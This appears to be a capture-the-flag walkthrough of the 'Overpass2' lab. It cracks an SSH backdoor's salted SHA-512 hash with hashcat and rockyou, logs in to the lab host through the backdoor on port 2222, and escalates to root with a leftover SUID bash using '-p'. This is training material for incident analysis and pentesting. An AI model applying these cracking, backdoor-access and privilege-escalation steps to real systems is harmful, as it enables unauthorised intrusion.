Overpass2
Overview
Premise:
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass' production server?
Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.
md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc
PCAP file analysis using wireshark
Review the program at -
https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go
Saved the hash and the salt in hash:salt format for cracking. The hashid indicates this is a sha512 and we already know that it uses a static salt. From hashcat’s help page, you can determine that the mode we should be using is 1710.
root@kinetic:/dev/shm# hashcat -a 0 -m 1710 ./hashfile.txt /usr/share/wordlists/rockyou.txt
1hashcat (v6.1.1) starting...
2
3OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
4=============================================================================================================================
5* Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 2891/2955 MB (1024 MB allocatable), 2MCU
6
7Minimum password length supported by kernel: 0
8Maximum password length supported by kernel: 256
9Minimim salt length supported by kernel: 0
10Maximum salt length supported by kernel: 256
11
12Hashes: 1 digests; 1 unique digests, 1 unique salts
13Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
14Rules: 1
15
16Applicable optimizers applied:
17* Zero-Byte
18* Early-Skip
19* Not-Iterated
20* Single-Hash
21* Single-Salt
22* Raw-Hash
23* Uses-64-Bit
24
25ATTENTION! Pure (unoptimized) backend kernels selected.
26Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
27If you want to switch to optimized backend kernels, append -O to your commandline.
28See the above message to find out about the exact limits.
29
30Watchdog: Hardware monitoring interface not found on your system.
31Watchdog: Temperature abort trigger disabled.
32
33Host memory required for this attack: 64 MB
34
35Dictionary cache hit:
36* Filename..: /usr/share/wordlists/rockyou.txt
37* Passwords.: 14344385
38* Bytes.....: 139921507
39* Keyspace..: 14344385
40
416d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:XXXXXXXXXXXX
42
43Session..........: hashcat
44Status...........: Cracked
45Hash.Name........: sha512($pass.$salt)
46Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
47Time.Started.....: Mon Sep 28 20:22:15 2020 (0 secs)
48Time.Estimated...: Mon Sep 28 20:22:15 2020 (0 secs)
49Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
50Guess.Queue......: 1/1 (100.00%)
51Speed.#1.........: 301.9 kH/s (0.56ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
52Recovered........: 1/1 (100.00%) Digests
53Progress.........: 18432/14344385 (0.13%)
54Rejected.........: 0/18432 (0.00%)
55Restore.Point....: 16384/14344385 (0.11%)
56Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
57Candidates.#1....: christal -> tanika
58
59Started: Mon Sep 28 20:21:59 2020
60Stopped: Mon Sep 28 20:22:17 2020
Note the port number from the pcap file where the ssh backdoor was installed and we already have the cracked password for james.
1eneloop@kinetic:~$ ssh [email protected] -p 2222
2The authenticity of host '[10.10.75.87]:2222 ([10.10.75.87]:2222)' can't be established.
3RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
4Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
5Warning: Permanently added '[10.10.75.87]:2222' (RSA) to the list of known hosts.
6[email protected]'s password:
7To run a command as administrator (user "root"), use "sudo <command>".
8See "man sudo_root" for details.
9
10james@overpass-production:/home/james/ssh-backdoor$
11$ cd ~
12james@overpass-production:/home/james$ cat user.txt
13thm{XXXXXXXXXXXXXXXXXXXXXXXXX}
14james@overpass-production:/home/james$
15
16
1$ ssh [email protected] -p 2222
2[email protected]'s password:
3To run a command as administrator (user "root"), use "sudo <command>".
4See "man sudo_root" for details.
There we have it! We can now use the suid_bash to escalate the privileges to root.
1james@overpass-production:/home/james/ssh-backdoor$ cd ..
2james@overpass-production:/home/james$ ls -all
3total 1136
4drwxr-xr-x 7 james james 4096 Jul 22 03:40 .
5drwxr-xr-x 7 root root 4096 Jul 21 18:08 ..
6lrwxrwxrwx 1 james james 9 Jul 21 18:14 .bash_history -> /dev/null
7-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
8-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
9drwx------ 2 james james 4096 Jul 21 00:36 .cache
10drwx------ 3 james james 4096 Sep 29 00:45 .gnupg
11drwxrwxr-x 3 james james 4096 Jul 22 03:35 .local
12-rw------- 1 james james 51 Jul 21 17:45 .overpass
13-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
14-rw-r--r-- 1 james james 0 Jul 21 00:37 .sudo_as_admin_successful
15-rwsr-sr-x 1 root root 1113504 Jul 22 02:57 .suid_bash
16drwxrwxr-x 3 james james 4096 Jul 22 03:35 ssh-backdoor
17-rw-rw-r-- 1 james james 38 Jul 22 03:40 user.txt
18drwxrwxr-x 7 james james 4096 Jul 21 01:37 www
1james@overpass-production:/home/james$ ./.suid_bash -p
2.suid_bash-4.4# cat /root/root.txt
3thm{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
4.suid_bash-4.4#